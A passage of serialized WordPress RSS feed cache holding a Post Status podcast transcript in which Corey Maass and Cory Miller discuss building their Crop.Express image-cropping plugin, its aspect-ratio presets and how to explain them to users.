href=\"https://wordpress.org/support/plugin/preferred-languages/\">support forum</a>, and open <a href=\"https://github.com/swissspidy/preferred-languages/issues\">new issues</a> to submit bug reports. Getting this project into core will make using WordPress and its plugin and theme ecosystems more accessible for non-English speakers.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 06 Apr 2023 13:58:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"Post Status: Launching a WordPress Product in Public: Session 8\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=148693\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://poststatus.com/launching-a-wordpress-product-in-public-session-8/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:82279:\"<div class=\"wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background is-layout-flow\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\">In this episode, <a href=\"https://twitter.com/corymiller303\">Cory Miller</a> and <a href=\"https://twitter.com/coreymaass\">Corey Maass </a>discuss their experiences and insights on launching <a href=\"https://crop.express/\">Crop.Express</a>. They share valuable advice on building a brand, developing a minimum viable product (MVP), getting feedback from the community, and handling challenges along the way. </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n<span class=\"span-reading-time rt-reading-time\"><span class=\"rt-label rt-prefix\">Estimated Reading Time:</span> <span class=\"rt-time\"> 42</span> <span class=\"rt-label rt-postfix\">minutes</span></span>\n</div></div>\n\n\n\n\n\n\n\n<p><a href=\"https://poststatus.com/planet/feed/#h-transcript\">Transcript</a> ↓</p>\n\n\n\n<p>As <a href=\"https://twitter.com/coreymaass\">Corey Maass</a> and <a href=\"https://twitter.com/corymiller303\">Cory Miller</a> move further into their experience of launching a WordPress product in public, they delve into the insights they’ve gained and the obstacles they are facing. Listen to their perspectives on building a community around the product, overcoming challenges, handling feedback, and implementing effective marketing strategies.</p>\n\n\n\n<p><strong>Top Takeaways:</strong></p>\n\n\n\n<ul>\n<li><strong>The Impact of Technology on Personal and Professional Lives</strong>: Technology has revolutionized various aspects of our lives, from communication and information access to work and productivity. This brings about the benefits and challenges of living in a digitally connected world, including privacy, cybersecurity, and work-life balance.</li>\n\n\n\n<li><strong>The Role of Mindfulness in the Digital Age:</strong> Mindfulness practices can help individuals navigate the challenges of the digital age, such as reducing stress, improving focus and concentration, and promoting healthy technology habits. Integrating mindfulness into daily routines and setting boundaries with technology is more important than ever.</li>\n\n\n\n<li><strong>The Need for Conscious and Intentional Technology Use:</strong> Being conscious and intentional about how we use technology, including being mindful of the impact of technology on our physical and mental health, relationships, and overall well-being, is critical. Being thoughtful about developing healthy technology habits, such as managing screen time, practicing digital detox, and being mindful of online behavior, can have a significant impact.</li>\n</ul>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n\n</div>\n\n\n\n<h3 class=\"eplus-wrapper wp-block-heading\" id=\"h-mentioned-in-the-show\"><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f517.png\" alt=\"🔗\" class=\"wp-smiley\" /> Mentioned in the show:</h3>\n\n\n\n<ul>\n<li><a href=\"https://crop.express/\">Crop.Express</a></li>\n\n\n\n<li><a href=\"https://ithemes.com/\">iThemes</a></li>\n\n\n\n<li><a href=\"https://calderaforms.com/\">Caldera Forms</a></li>\n\n\n\n<li><a href=\"https://restrictcontentpro.com/\">Restrict Content Pro</a></li>\n\n\n\n<li><a href=\"https://woocommerce.com/\">WooCommerce</a></li>\n\n\n\n<li><a href=\"https://www.gravityforms.com/\">Gravity Forms</a></li>\n</ul>\n\n\n\n<h3 class=\"eplus-wrapper wp-block-heading\" id=\"h-you-can-follow-post-status-and-our-guests-on-twitter\"><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f426.png\" alt=\"🐦\" class=\"wp-smiley\" /> You can follow Post Status and our guests on Twitter:</h3>\n\n\n\n<ul class=\"eplus-wrapper\">\n<li><a href=\"http://twitter.com/coreymaass\">Corey Maass</a></li>\n\n\n\n<li><a href=\"https://twitter.com/corymiller303\">Cory Miller</a> (CEO, <a href=\"https://twitter.com/post_status\">Post Status</a>)</li>\n\n\n\n<li><a href=\"https://twitter.com/lemonadecode\">Olivia Bisset</a> (Intern, <a href=\"https://twitter.com/post_status\">Post Status</a>)</li>\n</ul>\n\n\n\n<p class=\"eplus-wrapper has-background\">The <strong>Post Status Draft</strong> podcast is geared toward WordPress professionals, with interviews, news, and deep analysis. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f4dd.png\" alt=\"📝\" class=\"wp-smiley\" /><br /><br /><a href=\"https://poststatus.com/category/post-status-podcasts/\" target=\"_blank\" rel=\"noreferrer noopener\">Browse our archives</a>, and don’t forget to subscribe via <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\" target=\"_blank\" rel=\"noreferrer noopener\">iTunes</a>, <a href=\"https://podcasts.google.com/feed/aHR0cHM6Ly9mZWVkcy5zaW1wbGVjYXN0LmNvbS8ySkU5c2M4UA\" target=\"_blank\" rel=\"noreferrer noopener\">Google Podcasts</a>, <a href=\"https://www.youtube.com/c/PostStatus\" target=\"_blank\" rel=\"noreferrer noopener\">YouTube</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\" target=\"_blank\" rel=\"noreferrer noopener\">Stitcher</a>, <a href=\"https://wordpress-post-status-draft-podcast.simplecast.com/\" target=\"_blank\" rel=\"noreferrer noopener\">Simplecast</a>, or <a href=\"https://feeds.simplecast.com/2JE9sc8P\">RSS</a>. <img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f3a7.png\" alt=\"🎧\" class=\"wp-smiley\" /></p>\n\n\n\n<h2 class=\"eplus-wrapper wp-block-heading\" id=\"h-transcript\">Transcript</h2>\n\n\n\n<h2 class=\"wp-block-heading\">Session 8 Corey &amp; Cory Launch a WordPress Product Live</h2>\n\n\n\n<p>Corey Maass: [00:00:00] Sort of summarize the, summarize what we wanted, all of the features<br />we wanted, where we&#8217;re at, and then what the next steps are. Okay. Because I think, I think the<br />power balance is about to shift the power balance. Yeah. Previously we were waiting for me, I<br />think we&#8217;re, oh, I think I&#8217;m, I think I&#8217;m caught up.<br />And so I think we&#8217;re stepping more into w you know, you being able to do stuff for, um, you<br />know, we can start working on marketing assets and the website and stuff like that because the<br />plugin&#8217;s actually worth talking about .<br />Cory Miller: Okay. Gotcha. Well, do you want to catch me up on where we&#8217;re at with the<br />product?<br />Then we can shift gears to what&#8217;s<br />Corey Maass: next. Yeah, so the good news is, [00:01:00] um, we had started with Featured<br />image and I had jumped over and featured Image was, uh, had a nice walkthrough or a nice<br />flow. Choose your image, choose your shape, do your cropping. There it is. Um, I had added a<br />bypass button, um, and then had started stubbing out settings, um, so that you could build your<br />own, um, presets or calling them your own shapes, basically.<br />Um, size, width, whatever. Um, and then I had jumped over to Media Library cuz that was the<br />other one that I really wanted, or the next one that I really wanted, again, as a non guttenberg<br />user. Um, And so had brought that up to speed. So it, [00:02:00] now, if you go into media<br />library, there&#8217;s now a second button at the top is the choice we&#8217;ve made thus far.<br />Um, so if you go to library Yep. There&#8217;s a critical error. Uh oh.<br />is that, um, uh, we need to start using Insta. Insta, wp,<br />Cory Miller: um, oh,<br />Corey Maass: this is just my, yeah, go to, um, go to Insta WP and do it. Spin up a site<br />they really want. Um, I mean they&#8217;re, this product&#8217;s amazing Anyway, so you just launch one<br />click.<br />Oh, you reach your limit. Do it in incognito. Okay.[00:03:00]<br />Hackers. Um, but they, they&#8217;ve actually offered us a, um, a test account for, um, for using to use<br />c WP for this product, for these kinds of demos. So,<br />or you can do that.<br />Passwords. I&#8217;ve memorized it. I&#8217;ve memorized it. I&#8217;m gonna hack your account.<br />No kidding. .<br />Cory Miller: Oh my God. Come on, .<br />Corey Maass: Seriously, just do, uh, incognito. You don&#8217;t have to do any of this. There you go.<br />Oh, but now you have to share that window.<br />Nothing [00:04:00] is easy. Um, but anyway. Yeah, so Well, you&#8217;re good. Well you&#8217;re setting that<br />up. Um, so media library, uh, doing two things. One is<br />cheeky boogers. Do you want me to just share? I can walk us through it. Yeah. Okay. Um, how<br />are they tracking cookies? Uh, into incognito. That&#8217;s, uh, they&#8217;re being very sneaky. I think.<br />Enter my name. I don&#8217;t want to one click log in. All right. So I&#8217;m gonna share my screen.<br />Cory Miller: Um, okay. I&#8217;m into, oh, okay. Well then go,<br />Corey Maass: Okay, I got the<br />Cory Miller: free account. There you go. You&#8217;re a hackers. Okay, yeah,<br />Corey Maass: go for it. I&#8217;m here. So, [00:05:00] uh, magic login. There you go. And then plugins<br />add new crop, express, crop of the express.<br />And this is something we need to start working on. There you go. Cuz we, we wanna be first, so<br />we&#8217;ll have to start doing some testing on that. Um, so did you notice we had 10 plus click on<br />view details?<br />Uh, we are up to over 10 active installs, 10 plus.<br />Cory Miller: Oh, is that why you were showing me that? I was like, oh man, are you having a<br />bad day? Cuz you showed me that like Active was like, yeah, but they have these gaps and<br />stuff. But what you were trying to say was the plus<br />Corey Maass: we&#8217;re over 10. We finally made it over 10.</p>\n\n\n\n<p>That&#8217;s awesome. So yeah. So if you go to, yeah, so there&#8217;s now, uh, [00:06:00] settings, uh,<br />crop Express. Um, I put in just a little placeholder welcome. And what we&#8217;ve got here is identical<br />settings, but for all three instances of crop express, right? So you can crop, uh, your featured<br />image in posts, you can crop. There&#8217;s a block in Gutenberg and then media library.<br />So, um, all of them are, are identical. So click on media library, cuz then we&#8217;ll jump over to that.<br />Um, so you&#8217;ve got your presets. Um, so all of the default ones you can turn on and off and then<br />you can add your own. And then down below, uh, are the sizes and we just populate with some<br />sensible defaults, basically.<br />But you can say, uh, you know, make my image, um, oh, defaults shouldn&#8217;t say [00:07:00] max,<br />so I need to fix that. Um, but it&#8217;s the, if you upload a square, it&#8217;ll, it&#8217;ll automatically generate an<br />image that&#8217;s 2000 by 2000. Um, but if you up upload a rectangle one way or the other, The<br />wider side will be the maximum and the, and the smaller side will be the minimum.<br />Mm-hmm. , um, it took me a while to figure out what the heck they were talking about with Men&#8217;s<br />Max and default, but it&#8217;s that, so we need some, some happy text there to explain that. Um, and<br />then, yeah, so if you go back up to the top portion, portion in this page and turn off a couple of<br />these, the four threes or something, whatever, um, and then hit save.<br />And then if you go to media library or media in your menu, um, and if you click add new, it<br />automatically throws you back [00:08:00] to the media library, but with the crop Express open so<br />that you&#8217;re always using it. Um, which could be an option that we give. Um, and then, um, but,<br />and if you go to Media Library and say, Add new, there&#8217;s again, there&#8217;s a new button at the top.<br />Cory Miller: Okay. Can we go back for just one second cuz I wanna make sure I understand<br />this so that I could give feedback and help people. So yeah, of course. Okay. I think this is what</p>\n\n\n\n<p>tripped me up and it&#8217;s probably, cuz I&#8217;ve got old, old school, Adobe Photoshop in mind. Mm-<br />hmm. . But we&#8217;re saying for all the image settings, like here is the preset ratios in a sense, but</p>\n\n\n\n<p>it&#8217;s not just ratios, it&#8217;s like circles. It&#8217;s the preset what.<br />Corey Maass: Sure . Um, I&#8217;ve [00:09:00] gone back and forth between, uh, shapes and sizes.<br />So originally we were calling them sizes, but they&#8217;re not really sizes cuz that&#8217;s Yeah. Pixels. So<br />shapes, um, or preset aspect ratios is what they really are.<br />Mm-hmm. , I just, I worry that people don&#8217;t, that&#8217;s progress, right? Like that&#8217;s, that&#8217;s the most<br />correct way to put it. Um, but people don&#8217;t think that way. Mm-hmm. or like, again, using, using<br />one of my clients, uh, using my clients as an example, um, one of them this week, we kept<br />going back and forth unrelated to the plugin.<br />Obviously we kept going back and forth where, uh, she&#8217;s like, there&#8217;s a bug about uploading an<br />image. And I, I had it. Um, set so that they could upload, they should upload 16.9 featured<br />[00:10:00] images and, and she&#8217;s like, yeah, but what if it&#8217;s really tall? And I&#8217;m like, 16 nine is<br />16.9. And in her head, 16.9 and nine 16 are the same thing.<br />And Hmm. And that to me is like one, we, we can do some education, but two, you know, people<br />aren&#8217;t, uh, people don&#8217;t, aren&#8217;t nerds like me and thinking about 16 nine and nine 16 and yada<br />yada. So, um, yeah, I definitely think some video or a video that explains what any of this stuff<br />is. Mm-hmm. like I, maybe, maybe we&#8217;ve been taking that for granted, or now you and I on<br />session eight are, you know, in it, so we totally get it, but users may not, that kind of thing.<br />Okay.<br />Cory Miller: Um, Okay. Can we spend just a little time thinking about that? Um, yeah, of course.<br />[00:11:00] How, how nor, because I saw this and I was like, man, I know you&#8217;ve got these<br />incredibly smart thoughts about all this, but I was like, okay, I&#8217;m trying to get my head around it,<br />but if I think of, maybe I just share what I think and then Yep.<br />You compare that. Help me, because I don&#8217;t know if my knowledge is ancient. Um, okay. So I<br />go, I need a photo for, or I, I know I&#8217;m gonna want a photo featured image, whatever that is.<br />Okay. And then I go, okay, how wide is my now featured image blows this out. But I just, I go,<br />how wide do I need the photo to be?<br />Like, for most of these, I think I&#8217;m just processing my way. And then absolutely. Tell me.<br />Absolutely. Keep going. . So I go, okay. My constant pain in the butt with WordPress for years.<br />Anything like this. Yeah. Is you&#8217;re constrained [00:12:00] by column width mostly. Okay.<br />Featured image. Image. Just like our post stuff. I hate it because it&#8217;s like, I don&#8217;t want post<br />billboards on top of our, our posts.<br />I want them to get to the post anyway, so thank you for letting me digress. . Okay. So I go, I&#8217;m<br />writing a post, I want an image for it. I either think featured type in like a big image that kind of</p>\n\n\n\n<p>sets the tone, but to me, I&#8217;ve, I&#8217;ve always still gone, like it&#8217;s the post width. Mm-hmm. . Um, and I<br />don&#8217;t like the featured image issue there because in themes, for instance, like I&#8217;ll do an image<br />because.<br />I would do want to set a tone, but then it ends up in the featured and then a lot of themes will<br />pull that and it just looks wonky to me. Yeah. Like I haven&#8217;t thought about it, maybe thought<br />about it correctly, but I go, I want an image [00:13:00] and I default to width, like mm-hmm. , how<br />wide is, you know, the newsletter or the blog post or the theme that I have.<br />And then I kind of wanted to crop down to that specification appropriately for me. And<br />sometimes I just go, I just want width. And I&#8217;ll kind of adjust the height if I have a tool that lets me<br />do that. Um, like, I&#8217;m trying to think. When I was cropping in Photoshop, I would set, maybe we<br />could pull up photo.<br />I don&#8217;t have Photoshop, but I would go to their little cropping tool and go, I want it to be, what I<br />would do, Corey, is I would. Previously go it&#8217;s, I don&#8217;t know, four or 500 pixels is typically what<br />I&#8217;ve locked in my memory somehow is like most column widths for posts are four to 500 pixels<br />wide. Mm-hmm.<br />So I&#8217;d go and Photoshop, I&#8217;d go [00:14:00] to the crop tool, I&#8217;d have my image up, I&#8217;d go to the<br />crop tool and I&#8217;d say 400. And I would leave the height, um, uh, open. Mm-hmm. . And because,<br />you know, not every image does that. And then go, okay. Crop and save. Mm-hmm. , um, and<br />then upload to the, to WordPress. But again, I&#8217;m gonna acknowledge, I don&#8217;t even know if that&#8217;s<br />all probably the right workflow, but that&#8217;s how I&#8217;ve done it.<br />Yeah. You know,<br />Corey Maass: I, I think so. I, I think you&#8217;re right. Like one of my takeaways from that is,<br />I think we&#8217;re, we&#8217;re at a high level anyway. We&#8217;re making the same point that people don&#8217;t think<br />about aspect ratios necessarily as aspect ratios. But, you know, and talking about previously<br />we&#8217;ve talked about, uh, [00:15:00] consistency and that kind of thing, um, and, and making<br />images appear correct for your theme.<br />And so using featured image, you know, something&#8217;s popped into my head, which I think is a<br />neat idea. Um, featured image. So using featured image specifically, it&#8217;s like, how wide do you<br />need it? How wide does your theme want your image to be? And then what aspect ratio do you<br />want it to be? Mm-hmm. . So it&#8217;s like you&#8217;re, you go, you go look at, and we could do a little<br />video that&#8217;s like create a post.<br />Laura Ipsum post, add an image, even even publish it privately. And then go look at the image<br />and how it looks and you right click on it. Like we can give some instructions, but it&#8217;s like right<br />click on it, you know, how big is it rendering, [00:16:00] you know, and, and make your screen<br />the biggest. It it could, it can go.<br />So it&#8217;s like you, your theme is a maximum of 1300 pixels wide. And currently your design says<br />your image, your images go full width. So, so 1300 is the number you want. So width 1300. And<br />then we could e and we could do something, do a little UI in here that&#8217;s like, okay, here&#8217;s a<br />placeholder image, 1300 pixels wide.<br />You know, how much height do you want? That&#8217;s your aspect ratio. So click on 16 nine, right?<br />And it&#8217;s like, keep in mind, I mean, this is all education. Like I don&#8217;t, I&#8217;m not really sure how we<br />get there, but, um mm-hmm. , uh, but to say like, keep in mind, you know, on small screens, like<br />if you&#8217;re going 1300 wide, you don&#8217;t want to be, you know, 1300 tall and you really don&#8217;t wanna<br />be nine [00:17:00] 16 cuz then you are, you know, tw 2000 tall or whatever it is.<br />And it&#8217;s like, that takes, here&#8217;s why the re the reason is you don&#8217;t, you don&#8217;t want your reader to<br />have to scroll and scroll and scroll before actually getting to your words unless you do. Um, but<br />yeah, that&#8217;s, I think that&#8217;s something that, that we&#8217;re gonna have to<br />education too is, is a very grand word, but it&#8217;s like people don&#8217;t think about it. This much. Maybe,<br />you know, if they&#8217;re a writer, then they&#8217;ve never thought about it. They just grabbed a photo,<br />made it look cool. Mm-hmm. and uploaded. Mm-hmm. . And never thought other than like, do I<br />want a circle or not A circle.<br />Or there&#8217;s, I want a picture of a guy on a beach building a sandcastle and I don&#8217;t want the, the<br />shark in the background, so I&#8217;m gonna crop it.<br />Cory Miller: So I wonder, are there websites, [00:18:00] and I just happened to think of<br />beginner cause I know they do things really well. Like the final product, what mm-hmm. , see<br />how they do like this technically.</p>\n\n\n\n<p>Is there feature featured image? Mm-hmm. . Um, is there any other sites, I don&#8217;t want to just<br />hone in on this, but any other sites you think do a really good job of using photos in their blog<br />posts that we could look at real quick? Be The reason why I say that is because mm-hmm. .<br />Final product is really kind of what we&#8217;re selling.<br />You know what I mean? Like what they&#8217;re trying to get to is we, we had that extended talk where<br />we said, you know, it&#8217;s somehow flavors up the content and kind of Right. You know. Um, do you<br />have anybody else you&#8217;d think I&#8217;d like that we could just kinda look and get some ideas real<br />quick?<br />Corey Maass: Uh, no, cuz I never go to blogs.<br />Cory Miller: Okay. [00:19:00] Well let&#8217;s use them real quick. So see, like, I don&#8217;t know if they&#8217;ve<br />tagged this as a featured image, you know, in WordPress mm-hmm. , but you go, okay, from an<br />SEO side, headline, gray headline music and WordPress. Two good things they&#8217;re gonna get,<br />then they&#8217;ve got enough text here. I mean, this is a great formula, WP Beginner, you know?<br />Yeah. Because yeah, they own all the WordPress search terms. Um, what about to, so yeah, so<br />intro, and then they give this little nice little thing. So what are they doing here? They&#8217;re<br />restating, restating the, the headline and then providing something that looks kind of nice. Like, I<br />think this adds value to the Post personally.<br />Corey Maass: So go, go to, uh, Freemius . They always have good blog posts.[00:20:00]<br />Go to any of them. Um, and so these, I think this to me is the more standard blog post format.<br />Click on any. Um, I like Zach, right? So big image in this case, they have the headline over the<br />image and then a blog post. And so I bet the, the background of Zach is the featured image.<br />Okay.<br />Entry header. Entry thumbnail,[00:21:00]<br />yeah. With a title overlay.<br />And their image is 1600 by 500. So an aspect ratio of 16 five. 16 five.<br />Cory Miller: So there&#8217;s a lot here that I really like. Um, like this is a nice looking featured<br />images. Mm-hmm. , they&#8217;re taking, you know, they&#8217;re really, I think this is gonna be important for<br />us if you&#8217;ll indulge me for a second. Mm-hmm. . Um, okay. So they&#8217;ve taken profile photos easy.<br />I don&#8217;t know if they&#8217;re creating this, like where are they getting, how are they doing all these, but<br />looks standard, right?<br />Like there&#8217;s the same character,<br />Corey Maass: their little robot is theirs, so they must have an illustrator who&#8217;s creating them.<br />[00:22:00] But I bet some of this is probably just clip art,<br />but somebody&#8217;s taking the time to create these images. Yeah. Canva. P. Yeah. You know, some<br />other editor.<br />Cory Miller: Okay,<br />same here. Like, probably find the source to do that. Cutting. These are like screenshots, which<br />I think kind of might flow into your other project you were talking about, right?<br />Corey Maass: Ooh, here&#8217;s another good example. Um, go to, I&#8217;m gonna send it to in Slack.<br />What&#8217;s your name again? Just kidding. Bob<br />So this is actually really, I just googled for, you know, baking blog or [00:23:00] something, but<br />this is actually really neat. So this tape I, this jumps we&#8217;re jumped right into a category, but look<br />at the aspect ratio of these images. And if you click on any of them, they&#8217;re the. They&#8217;re the<br />same. And if you click through, they&#8217;re actually using the featured image, uh, to the side of the<br />title.<br />So like, here, here, I see it twice, go hit back once and click on the first one. There&#8217;s like swirly<br />brownies, which look very good. Yeah. Click on that. So there&#8217;s, there&#8217;s, you know, big brownie<br />image. Scroll down a little and let&#8217;s see if they use it again. I&#8217;m just curious. Yeah, so it does<br />repeat, but you see, it&#8217;s, it&#8217;s the, the coincidentally, I found a blog that has featured images that<br />are taller than they are wide, little unconventional, but again, an a, a different, a another<br />example of a [00:24:00] different layout.<br />Right. So you found, you went to WP Beginner. They use, it&#8217;s, it&#8217;s horizontal. And it&#8217;s in line. So<br />it&#8217;s gonna be smaller cuz it&#8217;s in that with it&#8217;s confined, confined by that column. Go to Freemius .<br />It&#8217;s, you know, 1600, it&#8217;s full width cuz they&#8217;re using it the way, um, I often think of a blog, they<br />want a big, big, big image that takes up the full header.<br />Um, and then found a cooking blog that does taller rather than wider, which I, I was sort of<br />including to just include, but coincidentally right away found a blog that does in fact do that. Um,</p>\n\n\n\n<p>and so I think what, you know, what we&#8217;re really getting at is, uh, again, it&#8217;s the, you know,<br />you&#8217;ve selected a theme or you already have a theme.<br />How are the images being shown? [00:25:00] And so the, you know, the, let&#8217;s pretend that<br />Hummingbird High. Is, uh, an amateur blogger. And so they are new to WordPress. Um, and so<br />they install a theme and they add start adding recipes, and they&#8217;re just taking, like we&#8217;ve talked<br />about, they&#8217;re just taking photos off their phone.<br />So they don&#8217;t know. I think, you know, to your point, they&#8217;re like, I haven&#8217;t put in any posts yet. I<br />don&#8217;t know how big I need my images. Um, the theme seems to want such and such an aspect<br />ratio where I&#8217;ve read the, let&#8217;s pretend they&#8217;re even like, nerdy enough to read the docs. Do the<br />docs include any mention of here&#8217;s how big you want your images, that kind of thing.<br />And so yeah, there&#8217;s, there&#8217;s a need for. [00:26:00] Again, the, the most thorough process of like<br />AIP, post, add a fake image, even temporarily, see how it renders, and then tho that&#8217;s the<br />information you want. Um, and I don&#8217;t know how to do that. I don&#8217;t know that we can do that for<br />them because as we&#8217;ve shown, you know, if you&#8217;ve got a blog that, if you&#8217;ve got a layout that<br />doesn&#8217;t label your featured image as a featured image, like I have no way of going and writing a<br />little code that like goes and scrapes it.<br />Mm-hmm. and imports that and tries to import that information.<br />Cory Miller: So what if we looked at the, okay, yes, that is, um, all that stuff underneath all this<br />that someone would need to, if they&#8217;re really gonna do this at a high, high level, they need to<br />understand all that stuff. Um, you [00:27:00] know, like really what is your theme?<br />I think for the premise for this free one could be like, if I just look at WP Beginner, um, you want<br />to, the outcome is nice looking, um, scaled appropriate images. There&#8217;s an NCO side to it, but<br />like how do you get somebody, and this is bigger than the plugin right now for sure, but you go, I<br />think a huge win could be like this makes it easier to get nice images that kind of break up.<br />Mm-hmm. your post and show specific things. And if I just go default. Don&#8217;t worry about themes<br />so much cuz those could be specific integrations. Like Cadence has an integration builder.<br />Builder. Right. You know, specific for that. That could be all that paid stuff that we talked about.<br />Yeah. But if I [00:28:00] go, if we keep it the way it is now, which is in, well it&#8217;s either fit featured<br />image, which for sure has the theme stuff that you were talking about, where you go in post,<br />how do you create something like, like this is, these sites we&#8217;ve seen have for are formulas and<br />I&#8217;m trying to think through how we can get through the formula is an easy button to nice looking<br />blog post with some images appropriately sized.<br />Mm-hmm. , um, you know, like I&#8217;ve long admired what WP Beginner does cause they&#8217;ve got this<br />formula that works. Like, yeah. All this, every post. Not trying to, this is not a negative to me.<br />Every post is a very defined formula. Yep. Screenshots are in here, you know? Um, they do<br />have to create an image and then still get it in there.<br />So they, that&#8217;s part of their formula. Just like your, [00:29:00] the baking site with the brownies,<br />you were, you were pulling apart the tech specs for how they do all that. And it seems like, yeah,<br />so anchoring back, back in these presets is like, how do you just get somebody to, Hmm. Sorry,<br />I&#8217;m probably getting a little lost in my own thoughts here, but<br />Corey Maass: as long as you keep talking,<br />you&#8217;re good.<br />Cory Miller: Um. But you go, like when you buy, when you get a product or you buy a product,<br />whatever, you&#8217;re, you&#8217;re really buying whatever the result of it is, you&#8217;re actually not buying the<br />product, you&#8217;re buying this out, this outcome.<br />Corey Maass: And when you buy a piece of software and fire it up, you start hacking away at it,<br />Photoshop you, you&#8217;re create new and then, [00:30:00] and it, and it says, here&#8217;s some, here&#8217;s<br />some document sizes, but you know, here&#8217;s a thousand by a thousand, a white canvas.<br />And off you go. And then you&#8217;re like, well, but I really want, I wanna see my text options. I wanna<br />see. And so then you start playing with what menus to show or hide or you start playing with,<br />and that&#8217;s when you dig in, right? So, um, yeah, I, we, what would be great, and this is, this is<br />sort of what we&#8217;ve started with.<br />again, sensible presets I, or sensible, I mean, I, again, I&#8217;m calling &#8217;em presets, preset aspect<br />ratios. So if somebody doesn&#8217;t go to the setting screen at all, they click featured image. They&#8217;ve<br />got six predefined aspect ratios that, again, are sensible. Um, and they&#8217;ve got, and, and they<br />don&#8217;t know anything about sizes, but we&#8217;ve put in some pretty [00:31:00] industry standard.</p>\n\n\n\n<p>Mm-hmm. , safe for mobile, safe for desktop image size, men and Max. So we might be pretty<br />close to what you&#8217;re talking about. Mm-hmm. and maybe six isn&#8217;t the magic number. Maybe it<br />should only be Square Circle and 16, nine. And the other ones are. Extra. So maybe it&#8217;s too<br />many. We don&#8217;t know that yet, but,<br />Cory Miller: well, you know what, I lost track a little bit of the settings page because this was<br />intended for the agency, like mm-hmm.<br />I mean, you deliver, like, one of our thesis here was you deliver a client project. This really, like<br />the intention for the settings was for those freelancers, web owners, agencies delivering<br />products or delivering websites to clients. And then from that point, like I was trying to reconcile<br />the settings page with just [00:32:00] being a user, but that wasn&#8217;t our intention.<br />Our intention was give those tools to put in the little scoot in the little bumpers on the bowling<br />lane, right? Like that&#8217;s what the agency does pull, you know, Hey, were you, we, whatever<br />theme framework we use, we know it&#8217;s gonna be 69. You know, put the minimal X. Yeah. And<br />then when they do that stuff from the featured image, And, and the user starts using it, it&#8217;s<br />already there.<br />So we&#8217;ve, we&#8217;ve taken this thought of like, this is, to me, this is for an agency to ship better<br />guardrails for images for their client work. Yeah. So my question to you, I mean, as a, you&#8217;ve set<br />this up with the thought, I thought, you know, as a developer, right? So like, I, I&#8217;m not, but I go,<br />your mindset was to do, put these tools, settings in here for that technical person at the agency.<br />Yeah. Or we delivered it. [00:33:00] Make sure this is like, go through real quick and set these,<br />and that&#8217;s, that was our intention for this. Yep. So as long as it speaks to the, like, I don&#8217;t have to<br />note it, know it necessarily as a user, as long as the devs do. And if we check that box, I think<br />it&#8217;s, we ship it and we start talking about like, we, what we try to do is give a.<br />Guard, I&#8217;m rehearsing some of this for a copy. Mm-hmm. , it was like, this is to give guardrails to<br />your clients for their images. Take, take it, take 30 seconds, you know, when before you deliver<br />the client and do these real quick, and then you&#8217;ll put the little bumpers on the bowling alley for<br />&#8217;em.<br />Corey Maass: Yeah. And I, I think I want to, the only, the only caveat or addition I want to add to<br />what you just said is that it&#8217;s not, let&#8217;s not say dev, right, because dev implies code is, it&#8217;s a scary<br />thing to [00:34:00] a lot of people, whereas.<br />Uh, you know, in my mind the, the word like there, there&#8217;s never been a good word for the<br />people who are WordPress pros who don&#8217;t necessarily write code or write a lot of code or write<br />custom plugins, right? So there&#8217;s still experts in my mind at some, at some time. Like 10 years<br />ago the word was, um, that I was introduced was implementer.<br />So it&#8217;s like someone who implements WordPress and WordPress tools but isn&#8217;t a developer,<br />right? But, so to me, this is like somebody who doesn&#8217;t even, doesn&#8217;t write code, but is setting<br />up a site for a client, installs their favorite theme, knows that the theme looks great with 16 nine<br />images. And so they&#8217;re the ones that are gonna go in and tweak these settings.<br />Um, and so, yeah, and, and I think the analogy of, there&#8217;s nothing that says. There&#8217;s really<br />nothing that [00:35:00] says you have to even touch that setting screen if 16, nine or circle<br />meets your needs. Um, and then the, and, but, but I agree, like the language could be a, a heck<br />of a lot friendlier. Um, and we need docs that explain it, right?<br />Um, and so that&#8217;s where like, I think, I think you come in and the kind of thinking that you&#8217;re<br />doing of, you know, the, the, the unknowledgeable, the as yet unknowledgeable user, you know.<br />So on that little welcome screen, on the settings page, it says, welcome, you know, watch a<br />62nd video that explains what the heck is going on here with 10 seconds.<br />That explains, you know, 